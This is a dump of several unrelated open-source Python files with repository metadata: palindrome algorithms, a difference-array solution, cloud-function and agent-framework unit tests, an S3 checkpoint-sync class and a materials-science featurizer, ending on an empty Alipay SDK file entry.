bfdb3ddcf3961c7a051fe1235f5291d2eca08848
|
[
"MIT",
"Giftware",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
TheAlgorithms/Python
|
7596a0e236ed12a61f9db19a7ea68309779cc85b
|
421ace81edb0d9af3a173f4ca7e66cc900078c1d
|
refs/heads/master
| 2023-09-01T17:32:20.190949
| 2023-08-29T13:18:10
| 2023-08-29T13:18:10
| 63,476,337
| 184,217
| 48,615
|
MIT
| 2023-09-14T02:05:29
| 2016-07-16T09:44:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,975
|
py
|
palindrome.py
|
# Algorithms to determine if a string is palindrome
from timeit import timeit
test_data = {
"MALAYALAM": True,
"String": False,
"rotor": True,
"level": True,
"A": True,
"BB": True,
"ABC": False,
"amanaplanacanalpanama": True, # "a man a plan a canal panama"
}
# Ensure our test data is valid
assert all((key == key[::-1]) is value for key, value in test_data.items())
def is_palindrome(s: str) -> bool:
"""
Return True if s is a palindrome otherwise return False.
>>> all(is_palindrome(key) is value for key, value in test_data.items())
True
"""
start_i = 0
end_i = len(s) - 1
while start_i < end_i:
if s[start_i] == s[end_i]:
start_i += 1
end_i -= 1
else:
return False
return True
def is_palindrome_traversal(s: str) -> bool:
"""
Return True if s is a palindrome otherwise return False.
>>> all(is_palindrome_traversal(key) is value for key, value in test_data.items())
True
"""
end = len(s) // 2
n = len(s)
# We need to traverse till half of the length of string
# as we can get access of the i'th last element from
# i'th index.
# eg: [0,1,2,3,4,5] => 4th index can be accessed
# with the help of 1st index (i==n-i-1)
# where n is length of string
return all(s[i] == s[n - i - 1] for i in range(end))
def is_palindrome_recursive(s: str) -> bool:
"""
Return True if s is a palindrome otherwise return False.
>>> all(is_palindrome_recursive(key) is value for key, value in test_data.items())
True
"""
if len(s) <= 2:
return True
if s[0] == s[len(s) - 1]:
return is_palindrome_recursive(s[1:-1])
else:
return False
def is_palindrome_slice(s: str) -> bool:
"""
Return True if s is a palindrome otherwise return False.
>>> all(is_palindrome_slice(key) is value for key, value in test_data.items())
True
"""
return s == s[::-1]
def benchmark_function(name: str) -> None:
stmt = f"all({name}(key) is value for key, value in test_data.items())"
setup = f"from __main__ import test_data, {name}"
number = 500000
result = timeit(stmt=stmt, setup=setup, number=number)
print(f"{name:<35} finished {number:,} runs in {result:.5f} seconds")
if __name__ == "__main__":
for key, value in test_data.items():
assert is_palindrome(key) is is_palindrome_recursive(key)
assert is_palindrome(key) is is_palindrome_slice(key)
print(f"{key:21} {value}")
print("a man a plan a canal panama")
# finished 500,000 runs in 0.46793 seconds
benchmark_function("is_palindrome_slice")
# finished 500,000 runs in 0.85234 seconds
benchmark_function("is_palindrome")
# finished 500,000 runs in 1.32028 seconds
benchmark_function("is_palindrome_recursive")
# finished 500,000 runs in 2.08679 seconds
benchmark_function("is_palindrome_traversal")
|
a79c1181b3866142475e78d7d8895cf1ca8488ca
|
f305f84ea6f721c2391300f0a60e21d2ce14f2a5
|
/22_专题/前缀与差分/差分数组/370. 区间加法-差分模板.py
|
efd606023048fe25d60cf69db6e2a23f2c26ed37
|
[] |
no_license
|
981377660LMT/algorithm-study
|
f2ada3e6959338ae1bc21934a84f7314a8ecff82
|
7e79e26bb8f641868561b186e34c1127ed63c9e0
|
refs/heads/master
| 2023-09-01T18:26:16.525579
| 2023-09-01T12:21:58
| 2023-09-01T12:21:58
| 385,861,235
| 225
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 690
|
py
|
370. 区间加法-差分模板.py
|
from typing import List
# 假设你有一个长度为 n 的数组,初始情况下所有的数字均为 0,你将会被给出 k 个更新的操作。
# 请你返回 k 次操作后的数组。
class Solution:
def getModifiedArray(self, length: int, updates: List[List[int]]) -> List[int]:
res = [0] * (length + 1)
for left, right, delta in updates:
res[left] += delta
res[right + 1] -= delta
for i in range(1, length + 1):
res[i] += res[i - 1]
return res[:-1]
print(Solution().getModifiedArray(length=5, updates=[[1, 3, 2], [2, 4, 3], [0, 2, -2]]))
# 输出: [-2,0,3,5,3]
|
d852008afac8ab352534fc4de9507c5ed78c3815
|
a4ded6a73551bcb7cb3d70679f07a8f31a165465
|
/tests/test_view_functions.py
|
f69b21557bc29a1ef17656debc7c21b7bf7d1891
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
GoogleCloudPlatform/functions-framework-python
|
d324c4d99f0bb59bda3b930872f1294417e6cf93
|
45aed538b5e39655318c7841457399fa3376ceaf
|
refs/heads/main
| 2023-09-05T08:05:03.935120
| 2023-08-28T23:28:46
| 2023-08-28T23:28:46
| 231,433,569
| 740
| 136
|
Apache-2.0
| 2023-09-08T00:40:30
| 2020-01-02T18:01:56
|
Python
|
UTF-8
|
Python
| false
| false
| 7,354
|
py
|
test_view_functions.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pretend
import pytest
import werkzeug
from cloudevents.http import from_http
import functions_framework
def test_http_view_func_wrapper():
function = pretend.call_recorder(lambda request: "Hello")
request_object = pretend.stub()
local_proxy = pretend.stub(_get_current_object=lambda: request_object)
view_func = functions_framework._http_view_func_wrapper(function, local_proxy)
view_func("/some/path")
assert function.calls == [pretend.call(request_object)]
def test_http_view_func_wrapper_attribute_copied():
def function(_):
pass
function.attribute = "foo"
view_func = functions_framework._http_view_func_wrapper(function, pretend.stub())
assert view_func.__name__ == "function"
assert view_func.attribute == "foo"
def test_event_view_func_wrapper(monkeypatch):
data = pretend.stub()
json = {
"context": {
"eventId": "some-eventId",
"timestamp": "some-timestamp",
"eventType": "some-eventType",
"resource": "some-resource",
},
"data": data,
}
request = pretend.stub(headers={}, get_json=lambda: json)
context_stub = pretend.stub()
context_class = pretend.call_recorder(lambda *a, **kw: context_stub)
monkeypatch.setattr(functions_framework, "Context", context_class)
function = pretend.call_recorder(lambda data, context: "Hello")
view_func = functions_framework._event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(data, context_stub)]
assert context_class.calls == [
pretend.call(
eventId="some-eventId",
timestamp="some-timestamp",
eventType="some-eventType",
resource="some-resource",
)
]
def test_event_view_func_wrapper_bad_request(monkeypatch):
request = pretend.stub(headers={}, get_json=lambda: None)
context_stub = pretend.stub()
context_class = pretend.call_recorder(lambda *a, **kw: context_stub)
monkeypatch.setattr(functions_framework, "Context", context_class)
function = pretend.call_recorder(lambda data, context: "Hello")
view_func = functions_framework._event_view_func_wrapper(function, request)
with pytest.raises(werkzeug.exceptions.BadRequest):
view_func("/some/path")
def test_run_cloud_event():
headers = {"Content-Type": "application/cloudevents+json"}
data = json.dumps(
{
"source": "from-galaxy-far-far-away",
"type": "cloud_event.greet.you",
"specversion": "1.0",
"id": "f6a65fcd-eed2-429d-9f71-ec0663d83025",
"time": "2020-08-13T02:12:14.946587+00:00",
"data": {"name": "john"},
}
)
request = pretend.stub(headers=headers, get_data=lambda: data)
function = pretend.call_recorder(lambda cloud_event: "hello")
functions_framework._run_cloud_event(function, request)
expected_cloud_event = from_http(request.headers, request.get_data())
assert function.calls == [pretend.call(expected_cloud_event)]
def test_cloud_event_view_func_wrapper():
headers = {"Content-Type": "application/cloudevents+json"}
data = json.dumps(
{
"source": "from-galaxy-far-far-away",
"type": "cloud_event.greet.you",
"specversion": "1.0",
"id": "f6a65fcd-eed2-429d-9f71-ec0663d83025",
"time": "2020-08-13T02:12:14.946587+00:00",
"data": {"name": "john"},
}
)
request = pretend.stub(headers=headers, get_data=lambda: data)
event = from_http(request.headers, request.get_data())
function = pretend.call_recorder(lambda cloud_event: cloud_event)
view_func = functions_framework._cloud_event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(event)]
def test_binary_cloud_event_view_func_wrapper():
headers = {
"ce-specversion": "1.0",
"ce-source": "from-galaxy-far-far-away",
"ce-type": "cloud_event.greet.you",
"ce-id": "f6a65fcd-eed2-429d-9f71-ec0663d83025",
"ce-time": "2020-08-13T02:12:14.946587+00:00",
}
data = json.dumps({"name": "john"})
request = pretend.stub(headers=headers, get_data=lambda: data)
event = from_http(request.headers, request.get_data())
function = pretend.call_recorder(lambda cloud_event: cloud_event)
view_func = functions_framework._cloud_event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(event)]
def test_binary_event_view_func_wrapper(monkeypatch):
data = pretend.stub()
request = pretend.stub(
headers={
"ce-type": "something",
"ce-specversion": "something",
"ce-source": "something",
"ce-id": "something",
"ce-eventId": "some-eventId",
"ce-timestamp": "some-timestamp",
"ce-eventType": "some-eventType",
"ce-resource": "some-resource",
},
get_data=lambda: data,
)
context_stub = pretend.stub()
context_class = pretend.call_recorder(lambda *a, **kw: context_stub)
monkeypatch.setattr(functions_framework, "Context", context_class)
function = pretend.call_recorder(lambda data, context: "Hello")
view_func = functions_framework._event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(data, context_stub)]
assert context_class.calls == [
pretend.call(
eventId="some-eventId",
timestamp="some-timestamp",
eventType="some-eventType",
resource="some-resource",
)
]
def test_legacy_event_view_func_wrapper(monkeypatch):
data = pretend.stub()
json = {
"eventId": "some-eventId",
"timestamp": "some-timestamp",
"eventType": "some-eventType",
"resource": "some-resource",
"data": data,
}
request = pretend.stub(headers={}, get_json=lambda: json)
context_stub = pretend.stub()
context_class = pretend.call_recorder(lambda *a, **kw: context_stub)
monkeypatch.setattr(functions_framework, "Context", context_class)
function = pretend.call_recorder(lambda data, context: "Hello")
view_func = functions_framework._event_view_func_wrapper(function, request)
view_func("/some/path")
assert function.calls == [pretend.call(data, context_stub)]
assert context_class.calls == [
pretend.call(
eventId="some-eventId",
timestamp="some-timestamp",
eventType="some-eventType",
resource="some-resource",
)
]
|
0d4d76a2a6c7764fd7cfbeb14cc0483f6bb41986
|
019f03d6713a2bc5344b644aeb5ebe70aaf7cfd0
|
/src/super_gradients/common/data_interface/adnn_model_repository_data_interface.py
|
0011ff44695448b91dc49a8336c12e1333e86dbd
|
[
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] |
permissive
|
Deci-AI/super-gradients
|
6f52cd15bc2f9f39e3cdc6067292b6512aba5dd0
|
7240726cf6425b53a26ed2faec03672f30fee6be
|
refs/heads/master
| 2023-08-25T17:47:02.595029
| 2023-08-24T11:50:50
| 2023-08-24T11:50:50
| 432,652,408
| 3,237
| 331
|
Apache-2.0
| 2023-09-14T11:24:46
| 2021-11-28T07:58:02
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 9,699
|
py
|
adnn_model_repository_data_interface.py
|
import os
import sys
from super_gradients.common.data_connection.s3_connector import S3Connector
from super_gradients.common.decorators.explicit_params_validator import explicit_params_validation
from super_gradients.common.environment.env_variables import env_variables
from super_gradients.common.abstractions.abstract_logger import ILogger
class ModelCheckpointNotFoundException(RuntimeError):
pass
class ADNNModelRepositoryDataInterfaces(ILogger):
"""
ResearchModelRepositoryDataInterface
"""
def __init__(self, data_connection_location: str = "local", data_connection_credentials: str = None):
"""
ModelCheckpointsDataInterface
:param data_connection_location: 'local' or s3 bucket 's3://my-bucket-name'
:param data_connection_credentials: credentials string
- name of aws profile in case data_connection_source is s3. will be taken form environment variable
AWS_PROFILE if left empty
"""
super().__init__()
self.tb_events_file_prefix = "events.out.tfevents"
self.log_file_prefix = "experiment_logs_"
self.latest_checkpoint_filename = "ckpt_latest.pth"
self.best_checkpoint_filename = "ckpt_best.pth"
if data_connection_location.startswith("s3"):
assert data_connection_location.index("s3://") >= 0, "S3 path must be formatted s3://bucket-name"
self.model_repo_bucket_name = data_connection_location.split("://")[1]
self.data_connection_source = "s3"
if data_connection_credentials is None:
data_connection_credentials = env_variables.AWS_PROFILE
self.s3_connector = S3Connector(data_connection_credentials, self.model_repo_bucket_name)
@explicit_params_validation(validation_type="None")
def load_all_remote_log_files(self, model_name: str, model_checkpoint_local_dir: str):
"""
load_all_remote_checkpoint_files
:param model_name:
:param model_checkpoint_local_dir:
:return:
"""
self.load_remote_logging_files(model_name=model_name, model_checkpoint_dir_name=model_checkpoint_local_dir, logging_type="tensorboard")
self.load_remote_logging_files(model_name=model_name, model_checkpoint_dir_name=model_checkpoint_local_dir, logging_type="text")
@explicit_params_validation(validation_type="None")
def save_all_remote_checkpoint_files(self, model_name: str, model_checkpoint_local_dir: str, log_file_name: str):
"""
save_all_remote_checkpoint_files - Saves all of the local Checkpoint data into Remote Repo
:param model_name: The Model Name to store in Remote Repo
:param model_checkpoint_local_dir: Local directory with the relevant data to upload
:param log_file_name: The log_file name (Created independently)
"""
for checkpoint_file_name in [self.latest_checkpoint_filename, self.best_checkpoint_filename]:
self.save_remote_checkpoints_file(model_name, model_checkpoint_local_dir, checkpoint_file_name)
self.save_remote_checkpoints_file(model_name, model_checkpoint_local_dir, log_file_name)
self.save_remote_tensorboard_event_files(model_name, model_checkpoint_local_dir)
@explicit_params_validation(validation_type="None")
def load_remote_checkpoints_file(
self, ckpt_source_remote_dir: str, ckpt_destination_local_dir: str, ckpt_file_name: str, overwrite_local_checkpoints_file: bool = False
) -> str:
"""
load_remote_checkpoints_file - Loads a model's checkpoint from local/cloud file
:param ckpt_source_remote_dir: The source folder to download from
:param ckpt_destination_local_dir: The destination folder to save the checkpoint at
:param ckpt_file_name: Filename to load from Remote Repo
:param overwrite_local_checkpoints_file: Use Only for Cloud-Stored Model Checkpoints if required behavior
is to overwrite a previous version of the same files
:return: Model Checkpoint File Path -> Depends on model architecture
"""
ckpt_file_local_full_path = ckpt_destination_local_dir + "/" + ckpt_file_name
if self.data_connection_source == "s3":
if overwrite_local_checkpoints_file:
# DELETE THE LOCAL VERSION ON THE MACHINE
if os.path.exists(ckpt_file_local_full_path):
os.remove(ckpt_file_local_full_path)
key_to_download = ckpt_source_remote_dir + "/" + ckpt_file_name
download_success = self.s3_connector.download_key(target_path=ckpt_file_local_full_path, key_to_download=key_to_download)
if not download_success:
failed_download_path = "s3://" + self.model_repo_bucket_name + "/" + key_to_download
error_msg = "Failed to Download Model Checkpoint from " + failed_download_path
self._logger.error(error_msg)
raise ModelCheckpointNotFoundException(error_msg)
return ckpt_file_local_full_path
@explicit_params_validation(validation_type="NoneOrEmpty")
def load_remote_logging_files(self, model_name: str, model_checkpoint_dir_name: str, logging_type: str):
"""
load_remote_tensorboard_event_files - Downloads all of the tb_events Files from remote repository
:param model_name:
:param model_checkpoint_dir_name:
:param logging_type:
:return:
"""
if not os.path.isdir(model_checkpoint_dir_name):
raise ValueError("[" + sys._getframe().f_code.co_name + "] - Provided directory does not exist")
# LOADS THE DATA FROM THE REMOTE REPOSITORY
s3_bucket_path_prefix = model_name
if logging_type == "tensorboard":
if self.data_connection_source == "s3":
self.s3_connector.download_keys_by_prefix(
s3_bucket_path_prefix=s3_bucket_path_prefix, local_download_dir=model_checkpoint_dir_name, s3_file_path_prefix=self.tb_events_file_prefix
)
elif logging_type == "text":
if self.data_connection_source == "s3":
self.s3_connector.download_keys_by_prefix(
s3_bucket_path_prefix=s3_bucket_path_prefix, local_download_dir=model_checkpoint_dir_name, s3_file_path_prefix=self.log_file_prefix
)
@explicit_params_validation(validation_type="NoneOrEmpty")
def save_remote_checkpoints_file(self, model_name: str, model_checkpoint_local_dir: str, checkpoints_file_name: str) -> bool:
"""
save_remote_checkpoints_file - Saves a Checkpoints file in the Remote Repo
:param model_name: The Model Name for S3 Prefix
:param model_checkpoint_local_dir: Model Directory - Based on Model name
:param checkpoints_file_name: Filename to upload to Remote Repo
:return: True/False for Operation Success/Failure
"""
# LOAD THE LOCAL VERSION
model_checkpoint_file_full_path = model_checkpoint_local_dir + "/" + checkpoints_file_name
# SAVE ON THE REMOTE S3 REPOSITORY
if self.data_connection_source == "s3":
model_checkpoint_s3_in_bucket_path = model_name + "/" + checkpoints_file_name
return self.__update_or_upload_s3_key(model_checkpoint_file_full_path, model_checkpoint_s3_in_bucket_path)
@explicit_params_validation(validation_type="NoneOrEmpty")
def save_remote_tensorboard_event_files(self, model_name: str, model_checkpoint_dir_name: str):
"""
save_remote_tensorboard_event_files - Saves all of the tensorboard files remotely
:param model_name: Prefix for Cloud Storage
:param model_checkpoint_dir_name: The directory where the files are stored in
"""
if not os.path.isdir(model_checkpoint_dir_name):
raise ValueError("[" + sys._getframe().f_code.co_name + "] - Provided directory does not exist")
for tb_events_file_name in os.listdir(model_checkpoint_dir_name):
if tb_events_file_name.startswith(self.tb_events_file_prefix):
upload_success = self.save_remote_checkpoints_file(
model_name=model_name, model_checkpoint_local_dir=model_checkpoint_dir_name, checkpoints_file_name=tb_events_file_name
)
if not upload_success:
self._logger.error("Failed to upload tb_events_file: " + tb_events_file_name)
@explicit_params_validation(validation_type="NoneOrEmpty")
def __update_or_upload_s3_key(self, local_file_path: str, s3_key_path: str):
"""
__update_or_upload_s3_key - Uploads/Updates an S3 Key based on a local file path
:param local_file_path: The Local file path to upload to S3
:param s3_key_path: The S3 path to create/update the S3 Key
"""
if self.s3_connector.check_key_exists(s3_key_path):
# DELETE KEY TO UPDATE THE FILE IN S3
delete_response = self.s3_connector.delete_key(s3_key_path)
if delete_response:
self._logger.info("Removed previous checkpoint from S3")
upload_success = self.s3_connector.upload_file(local_file_path, s3_key_path)
if not upload_success:
self._logger.error("Failed to upload model checkpoint")
return upload_success
|
055e2f5fcc1974fc3f843c905690a517238cd37c
|
ea57d267ab31480d8d731b2c095e9da9ad989133
|
/tests/test_packages/test_skills/test_tac_negotiation/test_helpers.py
|
19d2fc0852def6b2026f84d1e26b3aff4026d575
|
[
"Apache-2.0"
] |
permissive
|
fetchai/agents-aea
|
6d034f1db6f3beacf31dac2f5a1baaa60c8edb7d
|
bec49adaeba661d8d0f03ac9935dc89f39d95a0d
|
refs/heads/main
| 2023-08-08T23:19:06.276643
| 2023-02-04T10:46:39
| 2023-02-04T10:46:39
| 203,558,879
| 192
| 58
|
Apache-2.0
| 2023-07-19T04:45:26
| 2019-08-21T10:12:47
|
Python
|
UTF-8
|
Python
| false
| false
| 10,674
|
py
|
test_helpers.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2023 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the helpers module of the tac negotiation."""
from pathlib import Path
from aea.helpers.search.models import (
Attribute,
Constraint,
ConstraintType,
DataModel,
Description,
)
from aea.test_tools.test_skill import BaseSkillTestCase
from packages.fetchai.skills.tac_negotiation.helpers import (
DEMAND_DATAMODEL_NAME,
SUPPLY_DATAMODEL_NAME,
_build_goods_datamodel,
build_goods_description,
build_goods_query,
)
from tests.conftest import ROOT_DIR
class TestHelpers(BaseSkillTestCase):
"""Test Helper module methods of tac control."""
path_to_skill = Path(ROOT_DIR, "packages", "fetchai", "skills", "tac_negotiation")
@classmethod
def setup(cls):
"""Setup the test class."""
super().setup()
def test_build_goods_datamodel_supply(self):
"""Test the _build_goods_datamodel of Helpers module for a supply."""
good_ids = ["1", "2"]
is_supply = True
attributes = [
Attribute("1", int, True, "A good on offer."),
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
actual_data_model = _build_goods_datamodel(good_ids, is_supply)
assert actual_data_model == expected_data_model
def test_build_goods_datamodel_demand(self):
"""Test the _build_goods_datamodel of Helpers module for a demand."""
good_ids = ["1", "2"]
is_supply = False
attributes = [
Attribute("1", int, True, "A good on offer."),
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(DEMAND_DATAMODEL_NAME, attributes)
actual_data_model = _build_goods_datamodel(good_ids, is_supply)
assert actual_data_model == expected_data_model
def test_build_goods_description_supply(self):
"""Test the build_goods_description of Helpers module for supply."""
quantities_by_good_id = {"2": 5, "3": 10}
currency_id = "1"
ledger_id = "some_ledger_id"
is_supply = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_values = {"currency_id": currency_id, "ledger_id": ledger_id}
expected_values.update(quantities_by_good_id)
expected_description = Description(expected_values, expected_data_model)
actual_description = build_goods_description(
quantities_by_good_id, currency_id, ledger_id, is_supply
)
assert actual_description == expected_description
def test_build_goods_description_demand(self):
"""Test the build_goods_description of Helpers module for demand (same as above)."""
quantities_by_good_id = {"2": 5, "3": 10}
currency_id = "1"
ledger_id = "some_ledger_id"
is_supply = False
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(DEMAND_DATAMODEL_NAME, attributes)
expected_values = {"currency_id": currency_id, "ledger_id": ledger_id}
expected_values.update(quantities_by_good_id)
expected_description = Description(expected_values, expected_data_model)
actual_description = build_goods_description(
quantities_by_good_id, currency_id, ledger_id, is_supply
)
assert actual_description == expected_description
def test_build_goods_query(self):
"""Test the build_goods_query of Helpers module."""
good_ids = ["2", "3"]
currency_id = "1"
ledger_id = "some_ledger_id"
is_searching_for_sellers = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_constraints = [
Constraint("2", ConstraintType(">=", 1)),
Constraint("3", ConstraintType(">=", 1)),
Constraint("ledger_id", ConstraintType("==", ledger_id)),
Constraint("currency_id", ConstraintType("==", currency_id)),
]
actual_query = build_goods_query(
good_ids, currency_id, ledger_id, is_searching_for_sellers
)
constraints = [
(c.constraint_type.type, c.constraint_type.value)
for c in actual_query.constraints[0].constraints
]
for constraint in expected_constraints:
assert (
constraint.constraint_type.type,
constraint.constraint_type.value,
) in constraints
assert actual_query.model == expected_data_model
def test_build_goods_query_1_good(self):
"""Test the build_goods_query of Helpers module where there is 1 good."""
good_ids = ["2"]
currency_id = "1"
ledger_id = "some_ledger_id"
is_searching_for_sellers = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_constraints = [
Constraint("2", ConstraintType(">=", 1)),
Constraint("ledger_id", ConstraintType("==", ledger_id)),
Constraint("currency_id", ConstraintType("==", currency_id)),
]
actual_query = build_goods_query(
good_ids, currency_id, ledger_id, is_searching_for_sellers
)
for constraint in expected_constraints:
assert constraint in actual_query.constraints
assert actual_query.model == expected_data_model
|
052a55a981d5523aec693e2100805f9c6125e2f1
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/resolve/multiFile/importOsPath/yos/__init__.py
|
e87f1d2c7a3017b77c3ca9af54fdf6079f945022
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 32
|
py
|
__init__.py
|
def makedir(foo):
print foo
|
79365c2aec95e79224a3ba87a0642d09b0782a14
|
39b021eabbb8e3be1734cf92fd641965a796b0eb
|
/deepchem/feat/material_featurizers/element_property_fingerprint.py
|
c7bb2ee5039d06377509d0f11b09f49bc451a81b
|
[
"MIT"
] |
permissive
|
deepchem/deepchem
|
066cbf42316b2f6bec0166727e0264a485d5266f
|
ee6e67ebcf7bf04259cf13aff6388e2b791fea3d
|
refs/heads/master
| 2023-09-02T01:32:17.860111
| 2023-08-31T18:49:00
| 2023-08-31T18:49:00
| 43,098,215
| 4,876
| 1,905
|
MIT
| 2023-09-14T19:10:44
| 2015-09-24T23:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 3,508
|
py
|
element_property_fingerprint.py
|
import numpy as np
from deepchem.utils.typing import PymatgenComposition
from deepchem.feat import MaterialCompositionFeaturizer
from typing import Any
class ElementPropertyFingerprint(MaterialCompositionFeaturizer):
"""
Fingerprint of elemental properties from composition.
Based on the data source chosen, returns properties and statistics
(min, max, range, mean, standard deviation, mode) for a compound
based on elemental stoichiometry. E.g., the average electronegativity
of atoms in a crystal structure. The chemical fingerprint is a
vector of these statistics. For a full list of properties and statistics,
see ``matminer.featurizers.composition.ElementProperty(data_source).feature_labels()``.
This featurizer requires the optional dependencies pymatgen and
matminer. It may be useful when only crystal compositions are available
(and not 3D coordinates).
See references [1]_, [2]_, [3]_, [4]_ for more details.
References
----------
.. [1] MagPie data: Ward, L. et al. npj Comput Mater 2, 16028 (2016).
https://doi.org/10.1038/npjcompumats.2016.28
.. [2] Deml data: Deml, A. et al. Physical Review B 93, 085142 (2016).
10.1103/PhysRevB.93.085142
.. [3] Matminer: Ward, L. et al. Comput. Mater. Sci. 152, 60-69 (2018).
.. [4] Pymatgen: Ong, S.P. et al. Comput. Mater. Sci. 68, 314-319 (2013).
Examples
--------
>>> import deepchem as dc
>>> import pymatgen as mg
>>> comp = mg.core.Composition("Fe2O3")
>>> featurizer = dc.feat.ElementPropertyFingerprint()
>>> features = featurizer.featurize([comp])
>>> type(features[0])
<class 'numpy.ndarray'>
>>> features[0].shape
(65,)
Note
----
This class requires matminer and Pymatgen to be installed.
`NaN` feature values are automatically converted to 0 by this featurizer.
"""
def __init__(self, data_source: str = 'matminer'):
"""
Parameters
----------
data_source: str of "matminer", "magpie" or "deml" (default "matminer")
Source for element property data.
"""
self.data_source = data_source
self.ep_featurizer: Any = None
def _featurize(self, datapoint: PymatgenComposition,
**kwargs) -> np.ndarray:
"""
Calculate chemical fingerprint from crystal composition.
Parameters
----------
datapoint: pymatgen.core.Composition object
Composition object.
Returns
-------
feats: np.ndarray
Vector of properties and statistics derived from chemical
stoichiometry. Some values may be NaN.
"""
if 'composition' in kwargs and datapoint is None:
datapoint = kwargs.get("composition")
raise DeprecationWarning(
'Composition is being phased out as a parameter, please pass "datapoint" instead.'
)
if self.ep_featurizer is None:
try:
from matminer.featurizers.composition import ElementProperty
self.ep_featurizer = ElementProperty.from_preset(
self.data_source)
except ModuleNotFoundError:
raise ImportError(
"This class requires matminer to be installed.")
try:
feats = self.ep_featurizer.featurize(datapoint)
except:
feats = []
return np.nan_to_num(np.array(feats))
|
07b3d7c50572b518c1cac1970163cadb4125c630
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AntProdpaasArrangementCommonQueryModel.py
|
972cb67e8154c75a9e978bc94efbff4d0bf72f96
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,658
|
py
|
AntProdpaasArrangementCommonQueryModel.py
|
